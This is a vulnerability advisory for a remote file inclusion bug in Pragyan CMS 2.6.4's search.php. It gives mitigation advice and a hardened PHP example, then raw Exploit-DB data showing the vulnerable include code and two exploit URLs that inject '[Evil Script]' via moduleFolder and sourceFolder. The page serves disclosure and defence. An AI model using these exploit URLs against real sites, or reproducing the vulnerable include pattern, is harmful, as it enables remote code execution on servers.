Vendor: Pragyan CMS
By: Mr.SeCreT
CVSS: 9.3 (HIGH)
Vulnerability Type: Remote File Inclusion
CWE: 98
Product Name: Pragyan CMS
Affected Version From: 2.6.2004
Affected Version To: 2.6.2004
Patch Exists: No
Related CWE: N/A
CPE: a:pragyan:pragyan:2.6.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability

Pragyan CMS 2.6.4 is vulnerable to remote file inclusion because user-supplied input is used, without sanitization, to build the path passed to include(). An attacker can exploit this by sending a maliciously crafted HTTP request to the vulnerable application, which can allow the attacker to execute arbitrary code on the server.

Mitigation:

Input validation should be used so that only expected, local include paths can be built from request data, preventing the inclusion of maliciously crafted files. Additionally, the application should be configured to use the most restrictive file permissions possible.
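A hardened form of the include shown in the Exploit-DB data below, added here as an example that is not Pragyan's own code: the folder variables are initialised explicitly instead of being left for register_globals to fill, and the resulting path is canonicalised and checked for containment before include() runs. The directory layout (CMS root two levels above modules/search/) is an assumption taken from the exploit URL.

```php
<?php
// Added example, not Pragyan's own code: the include from the advisory rewritten
// so that neither $sourceFolder nor $moduleFolder can be set from a request.
// Assumed layout (from the exploit URL): CMS root is two levels above modules/search/.
declare(strict_types=1);

/**
 * Build an include directory from a trusted base and a relative module path.
 * Returns the canonical directory, or null if the result is not a real directory
 * inside $base. realpath() collapses "../" and returns false for URLs and
 * missing paths, so traversal and remote-include attempts never reach include().
 */
function safeIncludeDir(string $base, string $relative): ?string
{
    $baseReal = realpath($base);
    // Reject anything that is not a plain relative path: URL schemes (http://,
    // php://, data:), absolute paths, empty strings and NUL bytes.
    if ($baseReal === false || $relative === '' || $relative[0] === '/'
        || preg_match('/^[a-z][a-z0-9+.-]*:/i', $relative) === 1
        || strpos($relative, "\0") !== false) {
        return null;
    }
    $dirReal = realpath($baseReal . '/' . $relative);
    if ($dirReal === false || !is_dir($dirReal)) {
        return null;
    }
    // Containment: the resolved directory must sit strictly under the base.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($dirReal, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $dirReal;
}

// Always initialise these explicitly. With register_globals = On, an uninitialised
// $moduleFolder is silently filled from ?moduleFolder=..., which is the root cause
// described in the advisory (register_globals was removed in PHP 5.4).
$sourceFolder = __DIR__ . '/../..';   // CMS root (assumed layout)
$moduleFolder = 'modules';            // fixed, never taken from the request

$include_dir = safeIncludeDir($sourceFolder, "$moduleFolder/search/include");
if ($include_dir === null) {
    http_response_code(500);
    exit('search module include directory missing');
}
include "$include_dir/commonfuncs.php";
```

On the PHP side, register_globals = Off and allow_url_include = Off in php.ini remove the precondition the advisory relies on and the remote-include capability respectively, independent of any code change.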
Source

Exploit-DB raw data:

###################### Author: #############################
Author: Mr.SeCreT
E-mail: g-ff@hotmail.com
From: Syria
Greeting To: Milw0rm
############## Script Information: #########################
Script: Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability
Language: PHP
Download: http://garr.dl.sourceforge.net/project/pragyan/pragyan/2.6.4/pragyan-2.6.4.tar.gz
register_globals = On

################### Vul Code: ##############################
// search.php: $sourceFolder and $moduleFolder are used without being initialised, so with
// register_globals = On a request parameter of the same name supplies their value.
$searchModuleFolder = "$sourceFolder/$moduleFolder/search";
$include_dir = "$searchModuleFolder/include";
include ("$include_dir/commonfuncs.php");   // attacker-controlled path reaches include()

################### Exploit: ###############################
www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil Script]
www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil Script]

############################################################
The End